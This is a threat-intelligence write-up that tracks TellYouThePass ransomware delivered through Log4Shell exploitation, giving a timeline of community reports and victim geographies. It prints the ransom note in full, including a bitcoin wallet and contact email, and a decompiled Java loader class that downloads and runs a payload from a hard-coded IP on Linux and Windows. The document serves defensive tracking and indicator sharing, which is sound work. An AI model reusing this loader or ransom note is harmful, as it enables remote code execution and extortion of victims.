TellYouThePass ransomware via Log4Shell exploitation

Written by @TrevorGiffen

The Log4j2 exploit Log4Shell is being used to deploy TellYouThePass ransomware, an old and inactive ransomware family; prior to this event, TellYouThePass ransomware had not been mentioned on Twitter since 2020-07-23.

Research has been published in the Chinese-speaking community, but not in the English-speaking community until now. Judging from threat reports, this threat appears to be prominently affecting Chinese victims. We would like to especially highlight that TellYouThePass does not operate as a RaaS (Ransomware-as-a-Service).

2021-12-13:

  • Twitter user @80vul observed that ransomware was deployed on an old system that contained an internet-facing Log4j2 RCE vulnerability; another [now deleted] message was posted, with multiple responses containing references to TellYouThePass.
  • Twitter users @Tork_88 and @cibernicola_es responded with an indication that the ransomware family may have been called "TellYouThePass".
  • Curated Intel member @PolarToffee responded with an ID-Ransomware (IDR) metric, proving that on December 13th, more than 30 samples of "TellYouThePass" ransomware were submitted to IDR, indicating that "a very sudden spike in submissions for what is a very old ransomware [that day]." Toffee further elaborates that she is "not saying they are using log4j2 but that's certainly interesting."
  • On 2021-12-17, Curated Intel member @PolarToffee provided a follow-up ID-Ransomware (IDR) statistic. In this telemetry, between 2021-12-13 and 2021-12-17, victim geographies submitting ransom notes to IDR included China (20), Hong Kong (2), Japan (2), Taiwan (2), Belarus (1), Thailand (1), and United States (1).
2021-12-14:
  • Sangfor Threat Intelligence Team captured TellYouThePass ransomware samples and conducted an analysis, identifying TellYouThePass ransomware being deployed using the Log4j2 exploit.
    • Through honeypot collections, they identified TellYouThePass ransomware launching "thousands of attacks" against "[OA systems and an open-source project]" that contain Log4j2 vulnerabilities.
    • The group used the CVE-2021-44228 Log4Shell exploit to carry out an attack en masse.
    • command and control server will be communicated with as a background task.
    • After executing the exploit, they will download the ransomware file to Windows or Linux systems, and execute it to encrypt files.
    • Ransom notes are written to files called "README.html".
    • The referenced security blog shares what they claim to be "a large number of TellYouThePass ransomware interception logs."
    • The group deployed "only in the time period from 17:00 to 19:00 on December 12 and 17:00 to 19:00 on December 13, user data in multiple [Chinese] provinces and different industries have been encrypted, and they are all OA systems


2021-12-16:
  • Curated Intel members @nokae8 and @Myrtus0x0 analyzed a payload delivered to a vulnerable system via the Log4j2 exploit; ransomware was deployed and based on an analysis of the ransom note, they concluded the ransomware likely belong to the "TellYouThePass" ransomware family.
  • They kindly shared the malicious ransom file and Java class file for sharing via Curated Intel (see below), the contents of which can be validated with this sample.
Ransom file (README.html):

<html>
<head>
<title>
Recovery your files.
</title>
<style type="text/css">
.main {height:auto; width:100%;word-wrap:break-word}
</style>
</head>
<body>
<font color=#8B0000>
<b>I am so sorry ! All your files have been encryptd by RSA-1024 and AES-256 due to a computer security problems.</b></br>
<b>If you think your data is very important .The only way to decrypt your file is to buy my decrytion tool .</b></br>
<b>else you can delete your encrypted data or reinstall your system.</b></br>
</br>
<h2>Your personid :</h2>
<div class="main">
<b>MbNHLPyB+QAhKcdh2iX1eDVadrJ5j1y25QNqrtYe7MKa8eu9WqOjl84cOJwe71YU92iwpPxroh5fqfa8hui5A96EhC1MUhLUoPE/F8RFVLinwwXVnj+WZ822Fl2LM3Wzkj1g4uEVvghHO4bCGY4ikniEl76Jt/gkEpaPTrDdF/dxXcsmdXiZ+E0i4ssXEosteuEudIVezqLFk7xkjNG+X+h5aBMtMYvXjwnxVgdooBJTrdyswh0GXC8ec/sGk+gJtzev8rz7LwgTlONK8ZzMtrSH0UOLcrJEBfRdHvqwunN38RDjaAUKQV308uiGh8cuXNuqxBU5C0/yEKN23FjOpwmMzFARppQytGcHl6la3dmasb/8boqSgIsuEUO3XQDXjlzG3l3OOIc7oZ0hKMJdXxQ7FJbunw7Bx9b75x0tG9/E41NfLwQ9GV0vkiF4yBuO2FtASAlC1NwLFWBJECIMK1U7KgFTdjaogOATGz3h0o16IzaBhptA9juJ7HGLDI+RBZv7SLgRa9TR0TgOkQo9LERT1LC2WwFm+n4PhtGWn+mvwsQVRMn19z1PZvfF0f/S/DuhpGI4PWMVl0+7gmbycAUrgsatmtXE3+O/ukp6SzIrWJqjQFXk6Q8h3mGS0Oo543vFfzNrt3GyR734SX5bRCXMVWOx5MHcc2euiiZ5ShgLhwF0TVRHR++qoL6iSgstLw11Nfu9FEeY3Oh6FbajUNN7bWVIphWOMNHZLgNjrkq3xSZHLwywmyjENQb2S0PqrI/8QISoHano+m6FuetAPiDmsV+MTjD6pAGMEUMoR71ncEWE3HUHNIF4r7OPtv+myaPgPDgTQRbG6BQ9GdAz4Rzov0/E9PcfOssSocntd6zkeE2wZCAnZU/XZgq+/TdTrDWTbT0ayQuEq5db/mcdUj7Jd25boXxg2L1qP1662tcmBxOoRNGAEgxjkr9FZ5lJ4hxbEQ6hE84xa1M+LPBanqCqN3yWdejTvkT0SVV53/ax1Y5tD61f44ClmQHhIi9ZrerfodnSByAxuy7ICTWzKKWYrU16tNlB0dJk3GBIY5PD38D8YtpVyCyIG9D6QmBA9aM/ikxGoWOqloBpEWSygROXI1wjPT4CI4Y5/tAqeqY9EQ6UkahLP02Jofvof4dA5O2DeryXcLr5jxk3qsMJQVpPkb1fXaL898vMYxwqZXyOtRdJy91cSGW0LrMDMvFKsbK/TsqxqAllIhmNajwO4/Gm+ba1IPBBZX4u2mURFUAt63X2Jnvjhhkk7R/Z2w0bGiDywTqZcHkvu3HZilhuZsm6PCzF0lmwiG5SX4FSTu8BCVAQ0EDZiutybCLQ9knJ2kcYOV0ReF07k2YhN3zoKDDSewxJFzZNznLzrsdYOU4KsAGqp7ruc6Sy88HXZvXgf9vOUdqfML7jnwG751uNW80GOP4oJLJOgekcAJAGfOw8pASXSrkXlM0iqjFhAhio6/92uiN618/zrGK0Rgc7CGf5LXf8cc/Mo3ENM6NKZOxueCVLg8rRSoZR3Ny4JR2NR/4PXO3HWsplbQe1hS69FAt4et1SMdjYowiucMw0vrwn8sn7LEfpecjK5ad8a4wJtGlSRj10qyozr/x9T8P4dWMmbphUnULK2SibY2e8oedQBHuwIoIizgDpMJwXlcU9fmZm9Tooxf7fO/ScMuDClKMow9fpclbsdWYl2LXZVvo=</b></div></br>
</br>
</br>
<h2>Decrytion do as follows:</h2>
<b>1. if you not own bitcoin,you can buy it online on some websites. like https://localbitcoins.net/ or https://www.coinbase.com/  .</b></br>
<b>2. send 0.05 btc to my wallet address 1K25DjGJuqpK3cgKW15WmHXahuvAfUomVU.</b></br>
<b>3. send your btc transfer screenshots and your persionid to my email service@goodluckday.xyz . i will send you decrytion tool.</b></br>
</br>
</br>
<h2>Tips:</h2>
<b>1.don't rename your file </b></br>
<b>2.you can try some software to decrytion . but finally you will kown it's vain . </b></br>
<b>3.if any way can't to contact to me .you can try send me bitcoin and paste your email in the transfer information. i will contact you and send you decrytion tools.</b></br>
</br>
</br>
<b>Anything you want to help . please send mail to my email service@goodluckday.xyz.</b></br>
<b>Have a nice day . </b>
</font>
<body>
</html>

Java class file (Down.class.java):

import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

public class Down {
  public Down() {
    String str1 = "http://158.247.216.148:80/";
    String str2 = str1 + "ss64.exe";
    String str3 = str1 + "ss64";
    String str4 = System.getProperty("os.name");
    System.out.println(str4);
    if (str4.toLowerCase().startsWith("linux")) {
      String str = "/tmp/bash";
      saveUrlAs(str3, str);
      ExecLinux("chmod +x " + str + ";setsid " + str);
      ExecLinux("sleep 3");
      ExecLinux("nohup " + str + " &");
    } else if (str4.toLowerCase().startsWith("win")) {
      String str = "C:\\debug.exe";
      ExecWin("msiexec /q /i " + str1 + "ss64.msi");
      ExecWin("pinc -n 2 127.0.0.1");
    } 
    System.out.println("done");
  }
  
  public static void saveUrlAs(String paramString1, String paramString2) {
    File file = new File(paramString2);
    if (file.exists())
      System.out.println("exist " + paramString2); 
    FileOutputStream fileOutputStream = null;
    HttpURLConnection httpURLConnection = null;
    InputStream inputStream = null;
    try {
      URL uRL = new URL(paramString1);
      httpURLConnection = (HttpURLConnection)uRL.openConnection();
      httpURLConnection.setConnectTimeout(20000);
      httpURLConnection.setReadTimeout(60000);
      httpURLConnection.setRequestMethod("GET");
      httpURLConnection.setDoInput(true);
      httpURLConnection.setDoOutput(true);
      httpURLConnection.setUseCaches(false);
      httpURLConnection.connect();
      inputStream = httpURLConnection.getInputStream();
      BufferedInputStream bufferedInputStream = new BufferedInputStream(inputStream);
      fileOutputStream = new FileOutputStream(paramString2);
      BufferedOutputStream bufferedOutputStream = new BufferedOutputStream(fileOutputStream);
      byte[] arrayOfByte = new byte[4096];
      int i = bufferedInputStream.read(arrayOfByte);
      while (i != -1) {
        bufferedOutputStream.write(arrayOfByte, 0, i);
        i = bufferedInputStream.read(arrayOfByte);
      } 
      bufferedOutputStream.close();
      bufferedInputStream.close();
      httpURLConnection.disconnect();
    } catch (Exception exception) {
      exception.printStackTrace();
      System.out.println("down err");
    } 
  }
  
  public static void ExecLinux(String paramString) {
    try {
      System.out.println("this is linux");
      Process process = Runtime.getRuntime().exec(new String[] { "bash", "-c", paramString });
      InputStream inputStream = process.getInputStream();
      BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
      String str;
      while ((str = bufferedReader.readLine()) != null)
        System.out.println(str); 
      process.waitFor();
      inputStream.close();
      bufferedReader.close();
      process.destroy();
    } catch (Exception exception) {
      exception.printStackTrace();
      System.out.println("exec linux err");
    } 
  }
  
  public static void ExecWin(String paramString) {
    try {
      Process process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", paramString });
      InputStream inputStream = process.getInputStream();
      BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
      String str;
      while ((str = bufferedReader.readLine()) != null)
        System.out.println(str); 
      process.waitFor();
      inputStream.close();
      bufferedReader.close();
      process.destroy();
    } catch (Exception exception) {
      exception.printStackTrace();
      System.out.println("exec win err");
    } 
  }
}

Conclusively, Curated Intel will now track "TellYouThePass Ransomware" in place of the previously unnamed "New Ransomware" which was previously labelled on our Log4Shell-IOCs Github repository for targeting a server with an instance impacted by the Log4j2 vulnerability. Using this repository, members of Curated Intel have compiled, and validated, a list of IOC feeds and threat reports focused on the recent Log4Shell exploit targeting CVE-2021-44228 in Log4j.